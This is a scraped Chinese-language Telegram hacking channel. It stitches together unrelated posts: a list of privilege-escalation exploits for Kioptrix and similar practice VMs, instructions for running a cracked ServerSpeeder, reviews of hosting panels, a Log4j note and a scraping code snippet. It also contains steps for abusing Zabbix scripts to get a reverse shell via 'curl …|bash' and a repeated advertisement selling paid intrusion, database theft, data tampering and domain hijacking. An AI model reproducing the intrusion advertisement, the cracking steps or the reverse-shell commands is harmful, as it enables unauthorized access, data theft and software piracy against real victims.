网站破解权限 渗透劫持 黑客数据
5.01K subscribers
572 photos
1 video
51 links
Download Telegram
Kioptrix 1
内核漏洞攻击 – Apache mod_ssl < 2.8.7 OpenSSL – ‘OpenFuckV2.c’远程缓冲区溢出( https://www.exploit-db.com/exploits/764/ )
SMB漏洞利用 – Samba(2.2.1a) trans2open缓冲区溢出( https://www.exploit-db.com/exploits/7/ )
Kioptrix 2
内核漏洞利用 – Linux Kernel 2.6 < 2.6.19 – ‘ip_append_data()’ Ring0权限提升(1)( https://www.exploit-db.com/exploits/9542/ )
Kioptrix 3
在文件编辑器上设置SUID位 – 编辑/etc/sudoers文件以获得SUDO权限
Kioptrix 4
内核漏洞利用 – ‘Dirty COW’ ‘PTRACE_POKEDATA’竞争条件权限提升( https://www.exploit-db.com/exploits/40839/ )
MySQL漏洞利用 – MySQL 4.x/5.0 (Linux) – 用户定义函数(UDF)动态库(2)( https://www.exploit-db.com/exploits/1518/ )
内核漏洞利用 – 2.4/2.6 sock_sendpage() ring0 Root利用( https://packetstormsecurity.com/files/80539/Linux-2.4-2.6-sock_sendpage-Local-ring0-Root-Exploit.html )
Kioptrix 5
内核漏洞利用 – FreeBSD 9.0 – Intel SYSRET内核权限提升( https://www.exploit-db.com/exploits/28718/ )
SickOS 1.2
未正确配置的Cron任务 – Chkrootkit 0.49 – 本地权限提升( https://www.exploit-db.com/exploits/33899/ )
Stapler
正在运行的受漏洞影响版本Samba – SambaCry利用( https://www.rapid7.com/db/modules/exploit/Linux/samba/is_known_pipename )
未正确配置的Cron任务 – 全局可写cron文件
在.bash_history中找到root密码
内核漏洞利用 – Linux Kernel 4.4.x (Ubuntu 16.04) – ‘double-fdput()’ bpf(BPF_PROG_LOAD) 权限提升( https://www.exploit-db.com/exploits/39772/ )
1.复制ServerSpeeder文件夹到任意目录。
2.双击 serverSpeeder.bat 破解程序,启动锐速。
注意:每次开机都需要运行一次 serverSpeeder.bat ,才能正常启动锐速。
如要设置为开机自启,请用计划任务设置开机自启(因为需要管理员权限)。
在选择适合您的服务器和网站管理需求的面板软件时,1Panel是一个令人瞩目的选择。作为一款比宝塔更好用的面板,1Panel不仅提供丰富的功能,还拥有直观的界面和卓越的性能,让您能够更轻松地管理您的技术环境。
渗透 在线接单中:
渗透各类网站app软件,可做/数据库/权限/破解/更改数据
指定网站app渗透数据可按条 包库 劫持域名 实力靠谱唯一🆔 @YaMaa8
支持系统:Centos7-9、Debian9-11、Ubuntu18/20/22
Web环境:Nginx、Aoache
PHP版本:5.2-8.2
数据库:MySQL5.1/5.5-5.7/8.0、Redis等
扩展功能:文件管理、邮局、Supervisor等
AMH是国内首款开源的主机面板,程序开源透明、纯净、无混淆、无加密。 AMH是国内首个支持弹性多环境面板,软件模块化架构设计,高扩展灵活性。 付费版本和免费版本只是下载软件次数不同,并无太大影响。
支持系统:Centos、Debian、Ubuntu
Web环境:
PHP版本:5.4-8.2
数据库:Mysql5.6/5.7/8.0/8.1、Mariadb10.4-10.5、PostgreSQL、Redis等
扩展功能:Web终端、文件管理、Docker容器扩展
一个开源的面板,基本是基于Docker环境,因此兼容很多Linux系统。以Docke容器扩展,支持多种环境。新发布的面板,发布不足一年,稳定性还需要观察。
hestiacp是一款开源的面板,是vestacp分支,它可以管理服务器网站、邮箱、数据库等服务,功能强大,资源占用少,有用户管理和插件扩展,感觉不太好用。
CloudPanel是一款开源的Web虚拟主机控制面板,支持静态网站、PHP、Node.js和Python等Web配置。一网站一用户,功能比较简洁。
渗透 在线接单中:
渗透各类网站app软件,可做/数据库/权限/破解/更改数据
指定网站app渗透数据可按条 包库 劫持域名 实力靠谱唯一🆔 @YaMaa8
cyberpanel是首个支持LiteSpeed和OpenLiteSpeed的控制面板,LiteSpeed是一个收费的Web服务器,OpenLiteSpeed是它的免费版本。LiteSpeed是Apache轻量级替代方案,基本兼容Apache流行功能。
支持系统:Debian9-12、Ubuntu18/20/22、Centos7、AlmaLinux:8、Rocky8
Web环境:Nginx、Apache
PHP版本:5.2-8.2
数据库:Mysql、mariadb、PostgreSQL、Redis等
扩展功能:Web终端、DNS管理、邮局等
需要注册Fastpanel账号授权。多种功能扩展,可自定义安装。
MyVestaCP是VestaCP分支,该分支只支持Debian,VestaCP支持的系统版本比较低,感觉更新不活跃,可以使用hestiacp或MyVestaCP。HestiaCP基本保留VestaCP的界面,MyVestaCP使用新界面。VestaCP付费插件如文件管理等
在“监测中-->问题”此界面点击一台服务器,随即会弹出一个“脚本”选项卡,点击上面创建的"nc shell"。
渗透 在线接单中:
渗透各类网站app软件,可做/数据库/权限/破解/更改数据
指定网站app渗透数据可按条 包库 劫持域名 实力靠谱唯一🆔 @YaMaa8
这样上面的命令就会被执行。但是,由于选择的这台服务器没有安装nc,导致命令执行不成功。既然没有安装nc,那就给这台服务器安装nc呗!
Linux服务器get shell的方法。既然能够命令执行,那我们是不是可以在一台服务器上开放一个特定的端口,构造好反弹shell的代码,只要有客户端连接此端口,那么客户端的shell就会反弹到我们那台服务器上。
渗透 在线接单中:
渗透各类网站app软件,可做/数据库/权限/破解/更改数据
指定网站app渗透数据可按条 包库 劫持域名 实力靠谱唯一🆔 @YaMaa8
1
在Zabbix服务器上创建一个脚本,用于反弹shell的建立。
在命令里输入“curl 52..*.78|bash”。

执行上面的脚本
渗透 在线接单中:
渗透各类网站app软件,可做/数据库/权限/破解/更改数据
指定网站app渗透数据可按条 包库 劫持域名 实力靠谱唯一🆔 @YaMaa8
Log4j 漏洞 CVE-2021-45105:您需要了解的内容

了解 CVE-2021-45105 漏洞
Lookup 模式接受以下格式:

${lookupName:key:-defaultValue}

lookupName 是要执行的查找的名称或类型(例如 ctx, env等)。
keyctx 是在相应地图对象(如果是 地图) 中查找的变量的名称 ThreadContext 。
defaultValuekey 是一个可选值,它告诉替换器如果在映射中不存在 该查找实例,应该用什么来代替它 。
也许有读者已经知道了这一点:

如果映射中的变量 ThreadContext 受到攻击者控制,则可以使用默认值来保存与查找相同的字符串Context。
ScrapeGraphAI是一个网络爬虫 Python 库,使用大型语言模型和直接图逻辑为网站和本地文档(XML,HTML,JSON 等)创建爬取管道。
安装ollama
点击前往网站 https://ollama.com/ ,下载ollama软件,支持win、Mac、linux
以llama3为例,根据自己电脑显存性能, 选择适宜的版本。如果不知道选什么,那就试着安装,不合适不能用再删除即可。
👍1
在Python中调用本地ollama服务,需要先启动本地ollama服务, 打开电脑命令行cmd(mac是terminal), 执行
👍1
rom scrapegraphai.graphs import SmartScraperGraph


graph_config = {
"llm": {
"model": "ollama/llama3",
"temperature": 0,
"format": "json", # Ollama 需要显式指定格式
"base_url": "http://localhost:11434", # 设置 Ollama URL
},
"embeddings": {
"model": "ollama/nomic-embed-text",
"base_url": "http://localhost:11434", # 设置 Ollama URL
},
"verbose": True,
}

smart_scraper_graph = SmartScraperGraph(
prompt="返回该网站所有文章的标题、日期、文章链接",
# 也接受已下载的 HTML 代码的字符串
#source=requests.get("https://textdata.cn/blog/").text,
source="https://textdata.cn/blog/",
config=graph_config
)

result = smart_scraper_graph.run()
print(result)
1👍1